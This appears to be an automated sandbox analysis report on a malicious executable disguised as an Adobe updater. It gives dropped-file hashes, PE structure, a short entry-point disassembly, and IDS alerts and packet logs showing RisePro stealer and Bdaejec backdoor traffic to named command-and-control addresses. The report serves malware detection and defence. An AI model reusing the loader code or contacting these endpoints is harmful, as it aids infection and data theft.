SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\38070A7E.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\45FF0997.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\64EA12EF.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\rage131MP.tmp

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	13
Entropy (8bit):	3.0269868333592873
Encrypted:	false
SSDEEP:	3:LERUROn:2UROn
MD5:	2FBF213FEFE5CD3A597F58B207EAC447
SHA1:	6F84A117C3E6E1650C8957834B5671887AE647C7
SHA-256:	A60FAA8D9A81C78C0ED530E500E55B630E92529AD9A2BF226FA635591BCF251B
SHA-512:	40A592E9DE0C49A4E4980037BF79984573F022144F900F684DA3CB62B356D85037A75CA30C5C908424BE99988C04C9CBEAFF5BB8F024DD02884895F26DB686B1
Malicious:	false
Preview:	1721861467039

C:\Users\user\AppData\Local\Temp\xRp.exe

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe, Detection: malicious, Browse Filename: AIBIJIAO 12.exe, Detection: malicious, Browse Filename: ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe, Detection: malicious, Browse Filename: AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe, Detection: malicious, Browse Filename: aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe, Detection: malicious, Browse Filename: ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe, Detection: malicious, Browse Filename: 7Y18r(224).exe, Detection: malicious, Browse Filename: A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe, Detection: malicious, Browse Filename: A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe, Detection: malicious, Browse Filename: A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465957436664081
Encrypted:	false
SSDEEP:	6144:XIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSbn:YXD94+WlLZMM6YFHS+n
MD5:	FB9CD11F62FAE73069EF556B732BDC2E
SHA1:	E4EE71C79A1920E471383E7554F0C80F1AEC0132
SHA-256:	5AA6847E6E1D258CA84DBEFBEDBE9F796CE5C9AD4DAA2AADC437E3806012D296
SHA-512:	C631DB8D167C6386F05758A529A0BFCB9C0CB22E582CB6839335CE9AF891EFA75269C8D82B952125DD504F38714FEA7846398A55C0069C54B166260509AB46B6
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.956902857826616
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AdobeUpdaterV131.exe
File size:	2'342'912 bytes
MD5:	0bfb030dcbf461f2c76087e4b9856836
SHA1:	75425a8dc79a21373520a241a7c51d9a1ce7e91a
SHA256:	bdb5f42b5e4709134a4f963b9648af4f8e19e2011937f72ff3b75488887e3f14
SHA512:	618971540126ef2759bd98e1df88c2460a5d180994e5e709289889bdcb877e02c34859ac07051bf1e6c158ff5d51f58d1e9e49a44759762aa959854671f67f50
SSDEEP:	49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
TLSH:	99B533D28CB25562D25B2B7E57030703AB9F8CC32B2614862A69F6F13FBE7314562F15
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....

File Icon


Icon Hash:	07316cc4cc693307

Static PE Info

General

Entrypoint:	0x9a0000
Entrypoint Section:	u
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65BB8083 [Thu Feb 1 11:29:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 2E705278h
mov dword ptr [ebp-44h], 00657865h
mov dword ptr [ebp-40h], 00000000h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F09D104CDB5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFCD8Fh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F09D104CEFEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F09D104CE04h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F09D104CDFBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13b057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x136000	0x43b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x135000	0x8e800	fad6a260da2c3ae54cf441e7363aae49	False	0.999878358004386	data	7.980927554299119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x136000	0x43b0	0x1200	2287e35590bf0cb868f43cb8297b90ee	False	0.9405381944444444	data	7.670550810405519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x13b000	0x1000	0x200	ce7e7ba3b7e1f44d5bf269a78760122d	False	0.150390625	data	1.0530589234904126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x13c000	0x2bb000	0x200	fdf9e0a2d95953f46de7bbb6c82eea2a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
czumqxku	0x3f7000	0x1a5000	0x1a4a00	a52e5ed1b15e17f7eb70f0bf67f3c6e4	False	0.9875069650817236	data	7.951415630425814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oiivdxoz	0x59c000	0x1000	0x400	9f6a2d8879bf6d5a834ea44c84ddbee1	False	0.7861328125	data	6.090888886334667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x59d000	0x3000	0x2200	f149e84db479ef7d15612a021738f2ca	False	0.07123161764705882	DOS executable (COM)	0.8613319130180853	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
u	0x5a0000	0x5000	0x4200	050c15d33af2e2cb3b4dbf2a055c64f1	False	0.77734375	data	6.933507194790652	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5977e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m	Russian	Russia	0.40691489361702127
RT_ICON	0x597c50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	Russian	Russia	0.25656660412757976
RT_ICON	0x598cf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	Russian	Russia	0.19190871369294607
RT_GROUP_ICON	0x59b2a0	0x30	data	Russian	Russia	0.8125
RT_VERSION	0x59b2d0	0x2b8	COM executable for DOS	Russian	Russia	0.4899425287356322
RT_MANIFEST	0x59b588	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x59b86e	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T23:02:23.672844+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49751	799	192.168.2.4	44.221.84.105
2024-07-24T23:02:02.179085+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49732	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:21.179501+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49749	799	192.168.2.4	44.221.84.105
2024-07-24T23:02:06.867202+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49738	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:06.867241+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49737	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:50.529437+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49754	13.85.23.86	192.168.2.4
2024-07-24T23:01:54.455790+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.4	44.221.84.105
2024-07-24T23:01:59.210478+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49732	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:13.192674+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49745	13.85.23.86	192.168.2.4
2024-07-24T23:02:24.179265+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49750	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:16.085891+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49747	50500	192.168.2.4	193.233.132.62
2024-07-24T23:02:13.348213+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49746	443	192.168.2.4	20.42.73.29
2024-07-24T23:02:30.315987+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49753	799	192.168.2.4	44.221.84.105
2024-07-24T23:01:59.277372+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49731	799	192.168.2.4	44.221.84.105
2024-07-24T23:02:18.300399+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49748	799	192.168.2.4	44.221.84.105
2024-07-24T23:02:26.815817+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49752	799	192.168.2.4	44.221.84.105
2024-07-24T23:01:53.959653+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	54770	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 23:01:54.069199085 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.074023008 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:54.074652910 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.074652910 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.079530001 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:54.455583096 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:54.455725908 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:54.455790043 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.455790043 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.466489077 CEST	49730	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:54.471560001 CEST	799	49730	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:58.827625036 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:58.832779884 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:58.832875013 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:58.838676929 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:58.843839884 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:59.188435078 CEST	49732	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:01:59.193525076 CEST	50500	49732	193.233.132.62	192.168.2.4
Jul 24, 2024 23:01:59.193608999 CEST	49732	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:01:59.210478067 CEST	49732	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:01:59.215634108 CEST	50500	49732	193.233.132.62	192.168.2.4
Jul 24, 2024 23:01:59.277219057 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:59.277246952 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 23:01:59.277371883 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:59.298573971 CEST	49731	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:01:59.553520918 CEST	799	49731	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:02.179085016 CEST	49732	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:02.184036016 CEST	50500	49732	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:03.815967083 CEST	49737	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.816858053 CEST	49738	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.880575895 CEST	50500	49737	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:03.880605936 CEST	50500	49738	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:03.880675077 CEST	49737	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.880675077 CEST	49738	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.909684896 CEST	49738	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.912796021 CEST	49737	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:03.926983118 CEST	50500	49738	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:03.927030087 CEST	50500	49737	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:06.867202044 CEST	49738	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:06.867240906 CEST	49737	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:06.907049894 CEST	50500	49738	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:06.907474995 CEST	50500	49737	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:13.088603020 CEST	49747	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:13.096152067 CEST	50500	49747	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:13.096242905 CEST	49747	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:13.115951061 CEST	49747	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:13.122910976 CEST	50500	49747	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:16.085891008 CEST	49747	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:16.092010021 CEST	50500	49747	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:17.764566898 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:17.872101068 CEST	799	49748	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:17.872200012 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:17.872765064 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:17.878278017 CEST	799	49748	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:18.300318003 CEST	799	49748	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:18.300399065 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:18.303442001 CEST	799	49748	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:18.303518057 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:18.304910898 CEST	49748	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:18.316240072 CEST	799	49748	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:20.541172028 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:20.546658993 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:20.546777010 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:20.546958923 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:20.554620981 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:20.584566116 CEST	50500	49732	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:20.584652901 CEST	49732	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:20.978498936 CEST	49750	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:21.179239988 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:21.179261923 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:21.179270983 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:21.179501057 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:21.179501057 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:21.180563927 CEST	49749	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:21.186887026 CEST	50500	49750	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:21.186943054 CEST	799	49749	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:21.186971903 CEST	49750	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:21.216208935 CEST	49750	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:21.275276899 CEST	50500	49750	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:23.205265999 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.210485935 CEST	799	49751	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:23.210599899 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.211795092 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.217004061 CEST	799	49751	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:23.672770023 CEST	799	49751	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:23.672833920 CEST	799	49751	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:23.672843933 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.672909975 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.684767008 CEST	49751	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:23.690176964 CEST	799	49751	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:24.179265022 CEST	49750	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:24.184369087 CEST	50500	49750	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:25.276252031 CEST	50500	49737	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:25.276336908 CEST	49737	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:25.277502060 CEST	50500	49738	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:25.277554989 CEST	49738	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:26.413218021 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.418378115 CEST	799	49752	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:26.418472052 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.419012070 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.424474001 CEST	799	49752	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:26.815747976 CEST	799	49752	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:26.815817118 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.815898895 CEST	799	49752	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:26.815943003 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.817121029 CEST	49752	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:26.822128057 CEST	799	49752	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:29.893059969 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:29.898217916 CEST	799	49753	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:29.898323059 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:29.901801109 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:29.906738043 CEST	799	49753	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:30.315823078 CEST	799	49753	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:30.315876961 CEST	799	49753	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:30.315987110 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:30.316050053 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:30.317056894 CEST	49753	799	192.168.2.4	44.221.84.105
Jul 24, 2024 23:02:30.322189093 CEST	799	49753	44.221.84.105	192.168.2.4
Jul 24, 2024 23:02:34.559953928 CEST	50500	49747	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:34.560031891 CEST	49747	50500	192.168.2.4	193.233.132.62
Jul 24, 2024 23:02:42.558588028 CEST	50500	49750	193.233.132.62	192.168.2.4
Jul 24, 2024 23:02:42.558706045 CEST	49750	50500	192.168.2.4	193.233.132.62

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 23:01:53.959652901 CEST	54770	53	192.168.2.4	1.1.1.1
Jul 24, 2024 23:01:54.063004017 CEST	53	54770	1.1.1.1	192.168.2.4

DNS Queries

